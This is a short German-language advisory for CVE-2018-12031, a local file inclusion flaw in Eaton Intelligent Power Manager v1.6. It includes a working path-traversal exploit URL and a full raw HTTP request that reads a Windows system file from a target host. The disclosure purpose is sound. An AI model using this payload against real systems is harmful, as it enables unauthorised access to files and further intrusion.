
CVE-2018-12031 | LFI in Eaton Intelligent Power Manager v1.6 erlaubt einem Angreifer, eine Datei einzubinden, was zur Offenlegung sensibler Informationen, Dienstverweigerung und Codeausführung führen kann.
Local File Inclusion in Eaton Intelligent Power Manager v1.6 ermöglicht es einem Angreifer, eine Datei einzubinden, was zur Offenlegung sensibler Informationen, Denial-of-Service und Codeausführung führen kann.
Um die Schwachstelle auszunutzen, kann jemand die Anfrage 'https://[HOST]/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../' verwenden, um einige Informationen vom Ziel zu erhalten.
GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../windows/System32/drivers/etc/host HTTP/1.1
Host: 192.168.45.138:4680
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
